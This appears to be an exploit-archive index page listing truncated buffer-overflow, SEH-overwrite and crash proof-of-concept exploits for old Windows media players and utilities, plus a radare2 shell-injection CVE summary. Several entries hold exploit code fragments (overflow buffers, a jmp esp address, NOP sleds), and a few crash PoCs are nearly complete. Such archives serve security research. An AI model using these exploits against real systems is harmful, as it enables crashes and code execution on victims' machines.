NetChess 2.1 Buffer Overflow Exploit

Exploit Title: NetChess2.1 Buffer Overflow SEH Exploit Author: Ugur Eminli Vendor Homepage: https://sourceforge.net/projects/avmnetchess/ Software Link: https://sourceforge.net/projects/avmnetchess/ Version: 2.1 Tested on: WinXP SP2 Build 2600 !/usr/bin/perl my $file= "exploit.pgn"; my $junk=...

CVE-2020-15121

In radare2 before version 4.5.0, malformed PDB file names in the PDB server path cause shell injection. To trigger the problem it's required to open the executable in radare2 and run idpd to trigger the download. The shell code will execute, and will create a file called pwned in the current...

Frigate 3.36 SEH Buffer Overflow

Exploit Title: Frigate v3.36 SEH Buffer Overflow Version: 3.36 Exploit Author: Xenofon Vassilakopoulos Date: 03-05-2020 Vendor Homepage: http://www.Frigate3.com/ Software Link Download: http://www.Frigate3.com/download/Frigate3Stdv36.exe Tested on: Windows 7 Professional SP1 x86 Steps to reproduc...

Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE

Exploit Title: Code Blocks 16.01 - Buffer Overflow SEH UNICODE Date: 2020-04-17 Exploit Author: T3jv1l Software Link: https://sourceforge.net/projects/codeblocks/files/Binaries/16.01/Windows/codeblocks-16.01-setup.exe Software version: 16.01 buffer="A"536 buffer buffer+="\x61\x41" POPAD + Aligned...

Nsauditor 3.0.28.0 - Local SEH Buffer Overflow

Exploit Title: Nsauditor Local SEH Buffer Overflow Date: 15-12-2018 Vendor Homepage:http://www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Exploit Author: Achilles Tested Version: 3.0.28.0 Tested on: Windows XP SP3 1.- Run python code : Nsauditor.py 2.- Open...

CoolPlayer 2.19 - (Skin File) Local Buffer Overflow Exploit

No description provided by source. / CoolPlayer 2.19 Skin File Local Buffer Overflow Exploit Advisory: http://www.bmgsec.com.au/advisory/43/ Test box: WinXP Pro SP2 English Code reference is in skin.c, lines 464 - 480 Written and discovered by: r0ut3r writ3r at gmail.com / www.bmgsec.com.au /...

yPlay 1.0.76 (.mp3) Local Crash PoC

No description provided by source. !/usr/bin/perl Usage--file created--load file--b00m.mp3 BOOM print \n; print ! yPlay 1.0.76 .mp3 Local Crash PoC\n; print \n; print ! Author: cr4wl3r\n; print ! Mail: cr4wl3r!linuxmail.org\n; print \n; my $boom = A x 1337; my $filename = b00m.mp3; open...

VLC 2.1.2 - (.asf file) Crash PoC

No description provided by source. !/usr/bin/python VLC Media Player up to 2.1.2 DOS POC Integer Division By zero in ASF Demuxer VLC Media Player is prone to DOS utilizing a division by zero error if minimium data packet size is equal to zero. this was tested on windows XP sp3 and affects all...

Triologic Media Player 8 (.m3u) Local Universal Unicode Buffer Overflow (SEH)

No description provided by source. Exploit Title: Triologic Media Player 8 .m3u Local Universal Unicode Buffer Overflow SEH Date: August 17, 2010 Author: Glafkos Charalambous glafkos@astalavistadotcom Software Link: http://download.cnet.com/Triologic-Media-Player/3000-21394-10691520.html Version:...

CoolPlayer 2.18 - M3U Playlist Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl Versions affected: 2.18 Tested on: Windows XP Pro SP2 Author: data$hack Usage: expl.pl my $file= exs3.m3u; my $junk= A x 223; my $eip = pack'V',0x7C836940; jmp esp from kernel my $shellcode = \x90 x 10; $shellcode = $shellcode...

HTML Email Creator <= 2.1b668 (html) Local SEH Overwrite Exploit

No description provided by source. / :::::::-. ... ::::::. :::. ;;, ';, ;; ;;;;;;;, ;;; ' . ' $$, $$$$ $$$ $$$ Y$c$$ 888,o8P'88 .d888 888 Y88 MMMMP YmmMMMM MMM YM Discovered and Exploited by dun HTML Email Creator = 2.1 build 668 html Local SEH Overwrite Exploit Vendor: http://www.html-email.net/...

MediaCoder PMP Edition 0.8.17 Buffer Overflow

print """ +Exploit Title: MediaCoder PMP Edition 0.8.17 Buffer Overflow Exploit SEH +Download link: http://www.mediacoderhq.com/device/mpx.htm +Vulnerable Product: MediaCoder Personal Media Player Edition +Date found: 21.06.2013 +Date publish: 21.06.2013 +Founder: metacom +RST +Tested on: Windows...

Adrenalin Player 2.2.5.3 - .m3u Local Buffer Overflow (SEH)

Adrenalin Player 2.2.5.3 - .m3u Local Buffer Overflow SEH Exploit Title: Adrenalin Player 2.2.5.3 Buffer Overflow ExploitSEH http://software.naver.com/software/summary.nhn?softwareId=MFS100099 Author: seaofglass [email protected] Version : 2.2.5.3 Tested on: WinXP3 KOR, Win7 KOR my $file =...

IconCool MP3 WAV Converter 3.00 Build 120518 - Stack Buffer Overflow

IconCool MP3 WAV Converter 3.00 Build 120518 - Stack Buffer Overflow Exploit Title: IconCool MP3 WAV Converter Stack Buffer Overflow Vulnerability Date: 3/24/2013 Exploit Author: G0li47h Vendor Homepage: http://www.iconcool.com Software Link: http://www.iconcool.com/insticoncoolmp3wavconverter.ex...

Accmeware MP3 Cut 5.0.9 DoS PoC

Exploit for windows platform in category dos / poc Exploit Title: Accmeware MP3 Cut 5.0.9 DoS PoC Date: 12/20/2010 Author: 0v3r Software Link: http://www.mp3-cutter-splitter.com/Files/MCSetup.exe Version: 5.0.9 Tested on: Windows XP SP3 EN VirtualBxox CVE: N/A The application crashes when trys to...

Digital Audio Editor 7.6.0.237 Local Crash

Exploit Title: Digital Audio Editor 7.6.0.237 Local Crash PoC Software Link: http://www.audioeditor.us/dae/index.htm Tested on: Win XP SP3 Date: 15-12-2010 Author: h1ch4m Email: [email protected] my $file= "1.cda"; my $junk = "\x41" x 1000; open$FILE,"$file"; print $FILE $junk; close$FILE; print "Fi...

Easy DVD Creator Local Crash

Exploit Title: Easy DVD Creator Local Crash PoC Software Link: http://www.divxtodvd.net/dvd-creator.htm Tested on: Win XP SP3 Date: 15-12-2010 Author: h1ch4m Email: [email protected] my $file= "1.avi"; my $junk = "\x41" x 1000; open$FILE,"$file"; print $FILE $junk; close$FILE; print "File Created...

Visual MP3 Splitter &amp; Joiner 6.1 - &#039;.wav&#039; Buffer Overflow

Title: Visual MP3 Splitter & Joiner 6.1 .wav Buffer Overflow Vulnerability Author : anT!-Tr0J4n Email : D3v-PoinTathotmaild0tcom & C1EHatHotmaild0tcom Greetz : Dev-PoinT.com ; GlaDiatOr,SILVER STAR , HoBeeZ, Coffin Of Evil special thanks : r0073r,Sid3^effects,L0rd...

Digital Amp MP3 3.1 - &#039;.mp3&#039; Local Crash (PoC)

!/usr/bin/perl H0m3 : S3curity-art.com M4!l: [email protected] T3st3d on: Windows XP SP3 print "Tic-Tac"; my $boom="\x41" x 1500; my $filename = "B000M.mp3"; open FILE,"$filename"; print FILE "$boom"; print "\nFile successfully created!\n";...

KOL Wave Player 1.0 Local Buffer Overflow

!/usr/bin/perl Usage--file created--load file--b00m.wav BOOM print "\n"; print "! KOL Wave Player 1.0 .wav Local Buffer Overflow PoC\n"; print "\n"; print "! Author: cr4wl3r\n"; print "! Mail: cr4wl3r!linuxmail.org\n"; print "\n"; my $boom = "http://"."\x41" x 1337; my $filename = "b00m.wav"; ope...